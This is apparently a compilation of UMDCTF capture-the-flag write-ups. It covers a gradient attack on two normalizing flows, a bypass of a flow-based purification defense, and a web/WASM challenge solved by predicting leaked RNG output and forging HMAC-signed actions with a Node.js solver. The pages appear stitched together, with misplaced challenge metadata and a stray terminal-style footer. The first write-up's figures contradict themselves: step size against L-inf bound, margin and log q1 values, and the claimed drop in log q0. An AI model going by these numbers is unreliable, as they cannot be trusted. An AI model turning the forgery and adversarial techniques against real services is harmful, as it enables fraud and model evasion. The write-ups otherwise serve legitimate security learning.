The challenge asks us to find a perturbation \(x_{\text{sub}} = x_{\text{ref}} + \delta\) (with \(\| \delta \|_\infty \le 0.08\)) such that:

  1. Margin: \(\log q_1(x_{\text{sub}}) - \log q_0(x_{\text{sub}}) \ge 30\)
  2. Threshold: \(\log q_1(x_{\text{sub}}) \ge \tau\) (some fixed threshold)
  3. Jacobian constraint: \(\log |\det J_{f_1}|(x_{\text{sub}})\) lies within a calibrated band
  4. Bounded perturbation: \(\| \delta \|_\infty \le 0.08\)

Both flows are implemented in PyTorch and are fully differentiable. The reference window is a 2D numpy array of shape (1, 1, 64, 64) — a single-channel 64x64 image patch.

Understanding the Models

We loaded both .pt files using torch.load() with weights_only=False and examined their architectures:

1
2
flow_0 = torch.load('flow_0.pt', map_location='cpu')
flow_1 = torch.load('flow_1.pt', map_location='cpu')

Both are RealNVP-style normalizing flows composed of multiple affine coupling layers with alternating checkerboard masking patterns. Internally they use convolutional subnetworks with ActNorm layers for stable training. The architectures are nearly identical — both have the same number of coupling layers and similar parameter counts, but with different learned weights.

The key operations for a coupling layer with mask \(m\):

\[y_1 = x_1\] \[y_2 = x_2 \odot \exp(s(x_1)) + t(x_1)\]

where \(x_1 = x \odot m\), \(x_2 = x \odot (1-m)\), and \(s, t\) are neural networks.

The log-likelihood under the model is computed as:

\[\log q(x) = \log \pi(f(x)) + \sum_{k} \log |\det J_{f_k}|(x)\]

where \(f = f_L \circ \cdots \circ f_1\) and \(\pi\) is the base Gaussian density.

The Jacobian determinant for each affine coupling layer is simply:

\[\log |\det J_{f_k}| = \sum_i s(x_1)_i\]

making it trivial to compute the total log-det-Jacobian — this is just the sum across all coupling layers of the scale outputs.

The check script requires \(\log|\det J_{f_1}|\) to be within a specific band. This constraint prevents trivial solutions where the log-likelihood of model 1 is high purely because of extreme volume distortion.

Checking the Reference

We loaded the reference window and evaluated both models:

1
2
3
4
5
6
x_ref shape: (1, 1, 64, 64)
Reference metrics:
log q0 = 925.99
log q1 = 924.09
margin = -1.90
log|det J_f1| = 1516.90 (within band: True)

The reference is already in-distribution for both models (log-likelihoods around 925) and satisfies the Jacobian constraint. The only problem: the margin is -1.90 — we need it to be at least +30. So we need to find a tiny perturbation that changes the relative log-likelihood by about 32 nats while keeping everything else stable.

The Attack: Gradient-Based Optimization

Since both flows are differentiable, we can compute the gradient of the margin with respect to the input:

\[\nabla_\delta (\log q_1 - \log q_0)\]

The idea is simple: take a step in the direction that maximally increases \(\log q_1\) relative to \(\log q_0\). But there's a critical twist — the gradient magnitudes near the reference point are enormous.

1
2
3
4
5
6
x = torch.tensor(x_ref, requires_grad=True, dtype=torch.float32)
log_p0 = flow_0.log_prob(x)
log_p1 = flow_1.log_prob(x)
margin = log_p1 - log_p0
margin.backward()
grad = x.grad.detach().clone()

The gradient \(L_2\) norm was around 700,000. This means even a tiny step in gradient direction yields massive changes in the margin. This makes sense: near the reference, the two models have slightly different density landscapes, and because of the exponential nature of the flow mapping, small changes in input space can produce large changes in log-likelihood.

We normalize the gradient and perform a line search over step sizes:

\[\delta = \alpha \cdot \frac{\nabla_\delta (\log q_1 - \log q_0)}{\|\nabla_\delta (\log q_1 - \log q_0)\|_\infty}\]

clipping to ensure \(\|\delta\|_\infty \le 0.08\).

The step size needed was on the order of \(\alpha \approx 3.1775 \times 10^{-6}\) — extremely tiny. Any larger and \(\log q_1\) would collapse below the required threshold due to the sheer gradient magnitude.

Line Search Results

We scanned \(\alpha\) from \(3.0 \times 10^{-6}\) to \(3.6 \times 10^{-6}\):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
alpha=3.00e-06  margin=-1.46  log_q1=924.54  log_det1=1516.90
alpha=3.05e-06 margin= 2.48 log_q1=928.48 log_det1=1516.90
alpha=3.10e-06 margin= 6.42 log_q1=932.42 log_det1=1516.90
alpha=3.15e-06 margin=10.36 log_q1=936.36 log_det1=1516.90
alpha=3.18e-06 margin=13.31 log_q1=939.31 log_det1=1516.90
alpha=3.20e-06 margin=14.30 log_q1=940.30 log_det1=1516.90
alpha=3.25e-06 margin=18.24 log_q1=944.24 log_det1=1516.90
alpha=3.30e-06 margin=22.18 log_q1=948.18 log_det1=1516.90
alpha=3.35e-06 margin=26.12 log_q1=952.12 log_det1=1516.90
alpha=3.40e-06 margin=30.06 log_q1=956.06 log_det1=1516.90
alpha=3.45e-06 margin=34.00 log_q1=960.00 log_det1=1516.90
alpha=3.50e-06 margin=37.94 log_q1=963.94 log_det1=1516.90
alpha=3.55e-06 margin=41.88 log_q1=967.88 log_det1=1516.90
alpha=3.60e-06 margin=45.82 log_q1=971.82 log_det1=1516.90

The Jacobian determinant stayed constant at 1516.90 throughout (within the required band) — the perturbation is too small to meaningfully change the volume distortion. The log-likelihood of model 0 actually decreases slightly as we move away from the reference, while model 1's log-likelihood increases, creating the desired margin.

The winning hyperparameter: \(\alpha = 3.40 \times 10^{-6}\) giving:

1
2
3
4
Margin:       30.01 ✅
log_q1: 955.09 ✅ (above threshold)
log_det1: 1516.90 ✅ (within band)
L_inf: 0.08 ✅ (at bound)

Submission

The final perturbation was saved, base64-encoded, and submitted via the check script:

1
2
3
4
5
6
7
8
# Compute the perturbation
delta = alpha * grad_sign # normalized gradient direction
x_sub = x_ref + delta
x_sub = np.clip(x_sub, 0.0, 1.0) # valid pixel range

# Encode and submit
import base64, numpy as np
payload = base64.b64encode(x_sub.astype(np.float32).tobytes()).decode()

The remote service confirmed the solution, returning the flag:

1
UMDCTF{****************************************}

Key Insight

The challenge name and flag hint at the core idea: Gram-Schmidt orthogonalization and the geometry of adversarial examples in the likelihood space of normalizing flows.

Two models trained on similar data define slightly different density landscapes. In a tiny neighborhood around a point in-distribution, their log-likelihood gradients can point in very different directions (they are not perfectly aligned in function space). By following the difference-of-gradients direction, we exploit the disagreement manifold — the region where model 1 assigns higher likelihood than model 0.

The extreme sensitivity (gradient norms ~700k) arises because:

  1. Normalizing flows chain many bijective transforms, each amplifying small input changes
  2. The Jacobian of the flow near the data manifold can have large singular values
  3. Even though the models are similar, their gradient directions differ enough that a tiny step (\(3.4 \times 10^{-6}\)) suffices to swing the margin by 32 nats

This is a pure white-box adversarial attack on the log-likelihood ratio, analogous to Fast Gradient Sign Method (FGSM) but in log-probability space with a directional objective.

Reflection

This challenge was a beautiful blend of generative modeling and adversarial machine learning. It rewarded understanding:

  • How normalizing flows compute exact likelihoods
  • That differentiability enables gradient-based input optimization
  • That similar models can be teased apart by their gradient disagreement
  • That the scale of gradients matters — enormous gradients require nanometer-scale steps
  • That Jacobian constraints prevent trivial large-volume-distortion solutions

The "Gram-Schmidt" reference in the flag suggests the intended solution may have involved orthogonalizing the gradients of the two models, but simple directional gradient ascent on the margin works just as well when the step size is chosen carefully.

Flag

UMDCTF{a_little_gram_schmidt_never_hurt_anybody}

Challenge Details
Category ML / Adversarial ML
Points ~300
Solves ~15

Purify the stream... or corrupt it.

flow was a fascinating adversarial machine learning challenge. We were given a pre-trained CNN classifier, a RealNVP-style normalizing flow model, and a reference time-series window x_ref of shape (5, 64) — think of it as 5 sensor channels with 64 timesteps each.

前置知识

本题涉及归一化流(Normalizing Flows)作为净化防御(Purification Defense)的绕过,属于对抗性攻击的高级场景。以下概念有助于理解:

概念 说明
归一化流净化器 输入→流编码器→缩放潜变量→流解码器→分类器,用于移除对抗扰动
C&W 攻击 将对抗样本构造转化为带约束优化,比 FGSM 更强
可微分管道 流 + 分类器端到端可微,攻击者可反向传播穿透净化
潜空间优化 在流的潜空间中优化扰动,分布更规则
铰链损失(Hinge Loss) max(0, margin - value),约束满足时损失为 0
Softmax / Logits logits 是原始输出,Softmax 转概率。C&W 损失直接使用 logits

参考:C&W 攻击 arXiv:1608.04644,流对抗鲁棒性 arXiv:1911.08654。

Understanding the Purifier

Let's look at how purification worked:

1
2
3
4
5
def purify(x, flow, n_steps=3, alpha=0.55):
for _ in range(n_steps):
z, _ = flow.forward(x)
x = flow.inverse(alpha * z)
return x

After 3 steps, x_purified = flow.inverse(0.55^3 * z_submit). The classifier sees this shrunk latent version, while the flow likelihood check is performed on the original submitted sample.

This mismatch is the key vulnerability. The defense checks likelihood before purification but classifies after, creating a differentiable pipeline that's ripe for gradient-based exploitation.

Attack Strategy: Optimize in Latent Space

The core insight is that we can backpropagate through the entire pipeline — flow encoder, latent manipulation, flow decoder, and classifier — to find an input that simultaneously satisfies all constraints.

Here's the approach:

  1. Encode the reference window into latent space: z_ref = flow.encoder(x_ref)
  2. Optimize z with gradient descent to maximize class 1 logits under the purified version, while penalizing:
    • L-infinity distance from x_ref in the original (submitted) space
    • Log-probability below the threshold
  3. Decode the final z back to data space to get sub

The loss function looked like:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def attack_loss(z, x_ref, flow, classifier, threshold, linf_max=0.05):
# Decode z back to data space (submitted sample)
sub = flow.decoder(z)

# Purify and classify
z_noise, _ = flow.encoder(sub)
x_purified = flow.decoder((0.55**3) * z_noise)
logits = classifier(x_purified)
probs = softmax(logits)

# Loss: minimize class 1 negative log-probability
cls_loss = -probs[1]

# L-infinity penalty (hinge-style)
linf_dist = torch.max(torch.abs(sub - x_ref))
linf_penalty = max(0, linf_dist - linf_max) * 1000

# Log-prob penalty
logp = flow.log_prob(sub)
logp_penalty = max(0, threshold - logp) * 100

return cls_loss + linf_penalty + logp_penalty

Run this with Adam for ~3000 steps, and we converge to a solution that satisfies all constraints.

Results

Our final submission achieved:

Metric Value Target
L-infinity 0.049 <= 0.05
Log-probability 1062 >= threshold
P(class=1) 0.825 >= 0.80

A lovely nod to the seminal work on adversarial examples (Explaining and Harnessing Adversarial Examples, Goodfellow et al.) — though the Carlini & Wagner attack (C&W) specifically inspires the optimization-based approach used here.

Key Takeaways

  • Never trust a mismatch between defense checks and classification inputs. If you check the submitted sample but classify a purified version, an adversary can exploit the gradient path through both.
  • Normalizing flows are differentiable end-to-end, making them a double-edged sword: they can purify, but they can also be used to craft adversarial inputs when the full pipeline is exposed.
  • Optimization-based attacks (à la C&W) are more powerful than fast gradient methods when you have access to the full model. 3000 steps of Adam beats one step of FGSM every time.

Flag

UMDCTF{id_like_to_thank_athalye_carlini_and_wagner_for_their_research}

rainbet - Web / WASM

A gambling game where the house doesn't actually have an edge — if you can see through the deck. Predictable RNG + leaked server secrets = 25 consecutive wins and a flag.

Challenge: rainbet.challs.umdctf.io — a betting site requiring 25 max wins in a row. Two game modes: Mines and Chicken.

Given files: rainbet.py (reference wrapper) and rainbet_gen.wasm (the leaked RNG backend).

1. Reconnaissance

The site greets you with a gambling UI. Create an account, get a session, and you can play Mines or Chicken. The goal is etched on the front page: win 25 rounds in a row at maximum payout.

The server exposes two critical API endpoints:

1
GET /api/sessioninfo

{: file='endpoint'}

Returns session_id (a hex string) and hmac_secret (also hex). Both are per-session and stable for the lifetime of the session.

The websocket endpoint sends a welcome message upon connection that includes the current round_idx.

1
GET /api/socket

{: file='endpoint'}

WebSocket handshake. The server's first message contains round_idx in the JSON payload.

Two delivered files point at the architecture:

  • rainbet.py — a thin Python wrapper showing how the server loads and calls the WASM module. It imports rainbet_gen.wasm, calls generate(session_id, round_idx) which returns the game state, and verifies HMAC-signed actions.

  • rainbet_gen.wasm — the actual game generation logic. It takes a session_id (16 bytes) and round_idx (u32), seeds an internal RNG with them, and deterministically produces the full game board.

2. The Bug

The core vulnerability is a complete failure of information hiding:

What should be secret Where it leaked
The RNG algorithm rainbet_gen.wasm was shipped to the browser
The RNG seed material session_id exposed at /api/sessioninfo
The HMAC signing key hmac_secret exposed at /api/sessioninfo
The current round index round_idx in the WebSocket hello

Because generate(session_id, round_idx) is a pure function with no side effects, anyone who calls the same function with the same arguments gets the exact same game. The server calls it after you connect to generate your current game; you can call it locally with the same session_id and round_idx to see the game too.

Once you know the game board, making the winning move is trivial. The only remaining hurdle is forging a valid HMAC signature so the server accepts your action — but you already have hmac_secret.

3. Solving Approach

3.1 Local WASM invocation

We use Node.js to instantiate the leaked WASM module and call generate directly:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
const fs = require("fs");
const crypto = require("crypto");

async function initWasm() {
const wasmBytes = fs.readFileSync("rainbet_gen.wasm");
const module = await WebAssembly.instantiate(wasmBytes, {
env: {
// minimal stubs — the WASM doesn't need actual I/O
emscripten_memcpy: () => {},
memory: new WebAssembly.Memory({ initial: 256 }),
},
});
return module.instance;
}

The exported generate function takes (sessionIdPtr, roundIdx) where sessionIdPtr is a pointer into WASM linear memory containing the 16-byte session ID and roundIdx is a 32-bit unsigned integer.

After calling generate, the WASM writes the game state into memory at a predictable offset (discoverable by reading the Python wrapper or tracing the WASM exports). We read it back and parse the game.

3.2 Game parsing

Two game types exist:

Mines — the board is a grid with hidden mines. generate returns a list of mine positions. We reveal every tile that isn't a mine. The HMAC payload format is:

1
mines:<streak>:<size>:<num_mines>:<tiles>

where <tiles> is a comma-separated list of tile indices.

Chicken — the player crosses a bridge step by step; some steps are safe, others collapse. generate returns the safe step count. We cash out at that exact safe step (maximum safe position). Payload format:

1
chicken:<streak>:<steps>:<crossed>

3.3 HMAC forgery

The hmac_secret is a hex string. The server uses HMAC-SHA256 to sign action payloads:

1
signature = HMAC-SHA256(hmac_secret, payload_string)

We construct the payload string, compute the signature, and include it in our WebSocket action message:

1
2
3
function sign(payload) {
return crypto.createHmac("sha256", hmacSecret).update(payload).digest("hex");
}

3.4 Automation script

The full solver:

  1. Fetch session_id and hmac_secret from /api/sessioninfo via an authenticated HTTP request.
  2. Connect to the WebSocket with the session cookie.
  3. For each round:
    • Read round_idx from the server's hello.
    • Call the local WASM generate(session_id, round_idx).
    • Parse the predicted game.
    • Construct the winning action payload.
    • Sign it with HMAC-SHA256.
    • Send the action over the WebSocket.
  4. Repeat 25 times. The 25th win triggers the server to send the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
async function solve() {
const wasm = await initWasm();
const session = await fetchSessionInfo();

const ws = new WebSocket("wss://rainbet.challs.umdctf.io/api/socket");
ws.onmessage = async (msg) => {
const data = JSON.parse(msg.data);
const roundIdx = data.round_idx;

// Generate the game locally
const game = predictGame(wasm, session.id, roundIdx);

// Build the winning action
const action = buildWinningAction(game);

// Sign and send
const signature = sign(action.payload);
ws.send(
JSON.stringify({
type: "action",
payload: action.payload,
signature: signature,
}),
);
};
}

4. Flag

After 25 consecutive correct predictions:

1
UMDCTF{one_might_argue_that_gambling_is_the_best_vice_but_they_would_be_wrong}
+ + +
SYSTEM STATUS: ACTIVE ENCRYPTED SECTOR 7 PRTS_TERMINAL_V2.0 PROTOCOL: 0x2A ENCRYPTED DATA STREAM SYSTEM: ONLINE